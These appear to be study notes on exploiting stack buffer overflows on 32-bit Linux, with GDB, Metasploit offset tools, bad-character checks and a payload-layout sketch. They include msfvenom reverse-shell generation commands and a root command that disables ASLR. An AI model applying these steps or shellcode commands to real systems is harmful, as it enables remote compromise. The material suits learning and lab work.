Stack-Based Buffer Overflows on Linux x86.md
---
abbr:
  - "IoT: Internet of Things"
  - "DEP: Data Execution Prevention"
  - "ASLR: Address Space Layout Randomization"
  - "ROP: Return Oriented Programming"
  - "GDB: GNU Debugger"
  - "FP: Frame Pointer"
  - "SP: Stack Pointer"
  - "EIP: Extended Instruction Pointer"
  - "EBP: Extended Base Pointer"
  - "NOPS: No Operation Instruction"
---
## Introduction

Buffer overflows are less common than they once were, but they are still widely found in embedded devices and IoT.

Buffer overflows can also occur in web applications. [Read more here](https://www.bleepingcomputer.com/news/security/you-can-bypass-authentication-on-hpe-ilo4-servers-with-29-a-characters/)

If more data is written to a reserved memory buffer or stack than it can hold, and the write is not bounds-checked, adjacent memory (including saved register values) is overwritten, which could allow code to be executed.

A buffer overflow could:
- Cause a program to crash
- Corrupt data
- Harm data structures in the program runtime
- Overwrite a function's return address so that attacker-chosen code runs with the vulnerable process's privileges

Most modern programming languages are not vulnerable to buffer overflows in normal code because they check array bounds and manage memory for the programmer, for example through [garbage collection](https://www.perplexity.ai/search/is-rust-also-vulnerable-to-buf-nk.nKBmiQHKGBdUieS7DAw#2)

**Return addresses** are stored in memory on the stack and point to the instruction where execution resumes after a function returns. If a return address is overwritten, it can be made to point to another function/subroutine.

![[Pasted image 20250407132053.png]]

**.text**
Stores the actual assembler instructions for the program. This area is read-only. An attempt to write to it will cause a segmentation fault.

**.data**
Stores global and static variables explicitly initialised by the program.

**Heap**
Heap memory is allocated here. It starts after the **.bss** section and grows towards higher memory addresses.

**Stack**
*Last-In-First-Out*. Where local variables are stored in [[C]]/[[C++]]. Defined area inside [[RAM]].
Contents are accessed via the *stack pointer*.

### Modern memory protections

Modern memory protections such as [[DEP]] and [[ASLR]] make buffer overflows much harder to exploit.

A [[Canary]] is a value placed on the stack in front of the return address and checked before the function returns, which allows a buffer overflow to be detected.

#### DEP

[[DEP]] marks regions of memory as non-executable.

These non-executable regions include the places where user input is stored, such as the stack.

The idea of [[DEP]] is to prevent an attacker from placing shellcode in memory and setting the instruction pointer to that shellcode.

To get around this, instead of executing code on the stack, attackers reuse instructions that already exist in executable memory (like .text) and use the overwritten return addresses to chain calls to them. This is called ROP.

#### ASLR

With ROP, the attacker needs to know where things are stored in memory. [[ASLR]] was introduced to defend against this by randomizing those addresses.

One way to get around [[ASLR]] is to leak memory addresses, but that is not easy to do.

### Vulnerable Program

`strcpy()` is vulnerable to buffer overflow because it does not check the size of the destination and keeps writing until it reaches the terminating null byte of the source.
[Read more](https://www.perplexity.ai/search/why-is-strcpy-vulnerable-to-bu-h6ANjBEUR5qEK4UeKWq8Wg#0)

To exploit the vulnerable [[C]] program reliably, first disable [[ASLR]] (this requires root)
`echo 0 > /proc/sys/kernel/randomize_va_space`

To compile a 32-bit [[C]] program with the stack canary disabled (`-fno-stack-protector`) and [[DEP]] disabled for the stack (`-z execstack`),
`gcc input.c -o output -fno-stack-protector -z execstack -m32`

There are more vulnerable [[C]] functions:
- `gets`
- `sprintf`
- `scanf`
- `strcat`

### GDB Introduction

[[GDB]] provides us with breakpoints and stack trace output and allows us to intervene in the execution of programs.

[[GDB]] can be used to view the created binary on the assembly level.

To set the default flavor (Intel or AT&T) use
`echo 'set disassembly-flavor <flavor>' > ~/.gdbinit`

Below is the format of the output from using the command `disassemble main` in [[GDB]]

| Memory Address | Address Jumps | Assembler Instruction | Operation Suffixes |
| -------------- | ------------- | --------------------- | ------------------ |

### CPU Registers

[[CPU]] registers can be split into:
- General registers
- Control registers
- Segment registers

General registers can be split into Data registers, Pointer registers and Index registers

#### Data registers

| **32-bit Register** | **64-bit Register** | **Description** |
| ------------------- | ------------------- | --------------- |
| `EAX` | `RAX` | Accumulator is used in input/output and for arithmetic operations |
| `EBX` | `RBX` | Base is used in indexed addressing |
| `ECX` | `RCX` | Counter is used for shift/rotate instructions and for counting loops |
| `EDX` | `RDX` | Data is used for I/O and in arithmetic operations for multiply and divide operations involving large values |

#### Pointer registers

| **32-bit Register** | **64-bit Register** | **Description** |
| ------------------- | ------------------- | --------------- |
| `EIP` | `RIP` | Instruction Pointer stores the offset address of the next instruction to be executed |
| `ESP` | `RSP` | Stack Pointer points to the top of the stack |
| `EBP` | `RBP` | Base Pointer is also known as `Stack Base Pointer` or `Frame Pointer` and points to the base of the current stack frame |

#### Index registers

| **32-bit Register** | **64-bit Register** | **Description** |
| ------------------- | ------------------- | --------------- |
| `ESI` | `RSI` | Source Index is used as a pointer from a source for string operations |
| `EDI` | `RDI` | Destination Index is used as a pointer to a destination for string operations |

![[Pasted image 20250408130412.png]]

The FP points at the base of the current stack frame, directly below the saved return address, and it does not move while the function runs.

To get the arguments that are going to be used by addMe, we add 4 to FP to reach the return address, 8 to reach the first argument and 12 to reach the second.
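The FP offsets described above can be sketched as a small calculation. This is only an illustration, assuming a standard 32-bit frame with 4-byte slots where the saved EBP sits at FP itself; the helper name `frame_slots` and the frame pointer value are hypothetical and not taken from the note.

```python
WORD = 4  # size of one stack slot on 32-bit x86


def frame_slots(fp, nargs):
    """Return the assumed address of each slot relative to the frame pointer."""
    slots = {
        "saved_ebp": fp,              # assumption: caller's EBP is stored at FP
        "return_address": fp + WORD,  # FP + 4
    }
    for i in range(nargs):
        # first argument at FP + 8, second at FP + 12, and so on
        slots[f"arg{i + 1}"] = fp + 2 * WORD + i * WORD
    return slots


fp = 0xFFFFD0E8  # hypothetical frame pointer value, for illustration only
for name, addr in frame_slots(fp, 2).items():
    print(f"{name:15s} {addr:#010x}  (FP+{addr - fp})")
```

In [[GDB]] the same slots could be inspected with something like `x/4xw $ebp` while stopped inside the function.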

**Keep in mind that the stack grows from high memory to low memory**

[Read more about the Stack](https://0xinfection.github.io/reversing/pages/part-15-stack.html)

## Take Control of EIP

```bash
gdb -q bow32

(gdb) run $(python -c "print('\x55'*1200)")
```

This will overwrite the **EIP** and **EBP**, as can be seen with the command:
`(gdb) info registers`

This process can be imagined visually
![[Pasted image 20250408135346.png]]

Since `strcpy()` does not check whether the source fits into the destination, it is vulnerable to buffer overflow.

We need the exact number of input bytes up to the EIP so that the following 4 bytes can be overwritten with our desired memory address.

To determine the offset, we use the pattern tool shipped with [[Metasploit]] to create a pattern that helps us determine the number of bytes before we can write to the EIP
`/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l <length> > pattern.txt`

Once we use the generated string as input in [[GDB]], we take the value of EIP and pass it to the matching [[Metasploit]] tool
`/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q <value of EIP>`

### Determine the Length for Shellcode

Once we know the number of bytes needed to be able to write into EIP, we will be able to overwrite it with the address pointing to our shellcode's beginning

```bash
(gdb) run $(python -c "print('Aa0Aa1...')")
(gdb) info registers eip
```

Find out how big our shellcode will be using [[Metasploit|msfvenom]]
`msfvenom -p linux/x86/shell_reverse_tcp LHOST=127.0.0.1 lport=31337 --platform linux --arch x86 --format c`

It is good practice to insert some NOPS before our shellcode, so that a jump landing anywhere in them slides into the shellcode.

To determine the length for the shellcode, we need:
1. A total of (number) bytes to get to the EIP
2. About 100 additional NOPS before our shellcode
3. A total of (number) bytes for shellcode

Below is a breakdown for the size allocation. The total here counts everything up to and including the 4 bytes that overwrite EIP, which is why EIP is subtracted as well.
- Buffer = "\x55" * (total bytes up to and including EIP - NOPs - shellcode - EIP)
- NOPS = "\x90" * 100
- Shellcode = "\x44" * 150
- EIP = "\x66" * 4

![[Pasted image 20250408164315.png]]

### Bad Character Identification

Many files in [[UNIX]]-like operating systems begin with a few bytes containing a **magic number** that determines the file type.

Such reserved characters also exist in applications, where they are known as **bad characters**.

These **bad characters** can vary, and we will see characters like these:
- `\x00` - Null Byte
- `\x0A` - Line Feed
- `\x0D` - Carriage Return
- `\x0C` - Form Feed
- `\xFF` - highest byte value (all bits set)

There is a list of all **256 characters** that can be checked against to find out which characters will cause the program to crash or truncate our input.

Use the formula from the previous section but replace the NOPS and Shellcode with CHARS
- Buffer = "\x55" * (total bytes up to and including EIP - number of chars (256) - EIP)
- CHARS = "\x00\x01.....\xFF"
- EIP = "\x66" * 4

We can't just run the main function straight through, because it will crash without giving us the possibility to follow what happens in memory.

To overcome this, we will set a breakpoint at the vulnerable function
`break <funcname>`

Once we have put a breakpoint at the function we want, we run it with our chars.

Then we can look at the stack
`(gdb) x/2000xb $esp+500`

Go through all the chars and note which character is missing. Remove it from the char list, update the count of the Buffer, and repeat until every remaining character shows up in memory.

### Generating Shellcode

To generate shellcode with [[Metasploit|msfvenom]], we can run
`msfvenom -p linux/x86/shell_reverse_tcp lhost=<lhost> lport=<lport> --format c --arch x86 --platform linux --bad-chars "<bad-chars>" --out <filename>`

Below is a breakdown for the size allocation
- Buffer = "\x55" * (total bytes up to and including EIP - NOPs - shellcode - EIP)
- NOPS = "\x90" * 100
- Shellcode = "\x44....."
- EIP = "\x66" * 4

Since we still have control over the EIP, we can tell it to jump to a memory address inside our NOPS sled.

**Make sure you know whether the system uses little-endian or big-endian. x86 is little-endian, so the address must be written into the payload with its bytes in reverse order**
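
The size breakdown and the byte-order note can be put together in a short sketch. It is a minimal illustration under stated assumptions, not a working exploit: `OFFSET` stands for the value reported by `pattern_offset.rb` (bytes before EIP), `RETURN_ADDR` is a made-up address inside the NOP sled, the shellcode is placeholder bytes, and the function name `build_payload` is hypothetical.

```python
import struct

OFFSET = 1036               # hypothetical: bytes before EIP (pattern_offset.rb result)
NOP_COUNT = 100
SHELLCODE = b"\x44" * 150   # placeholder bytes, not real shellcode
RETURN_ADDR = 0xFFFFD64C    # hypothetical address inside the NOP sled


def build_payload(offset, nop_count, shellcode, return_addr):
    """Lay out padding + NOP sled + shellcode + overwritten EIP."""
    nops = b"\x90" * nop_count
    pad_len = offset - len(nops) - len(shellcode)
    if pad_len < 0:
        raise ValueError("NOPs and shellcode do not fit before EIP")
    padding = b"\x55" * pad_len
    # "<I" packs a 32-bit unsigned integer in little-endian byte order
    eip = struct.pack("<I", return_addr)
    return padding + nops + shellcode + eip


payload = build_payload(OFFSET, NOP_COUNT, SHELLCODE, RETURN_ADDR)
print(len(payload))        # offset + 4 bytes for EIP
print(payload[-4:].hex())  # address bytes as they will appear in memory
```

When feeding such a payload to a program from Python 3, writing the raw bytes with `sys.stdout.buffer.write(payload)` avoids `print` re-encoding bytes such as `\x90`.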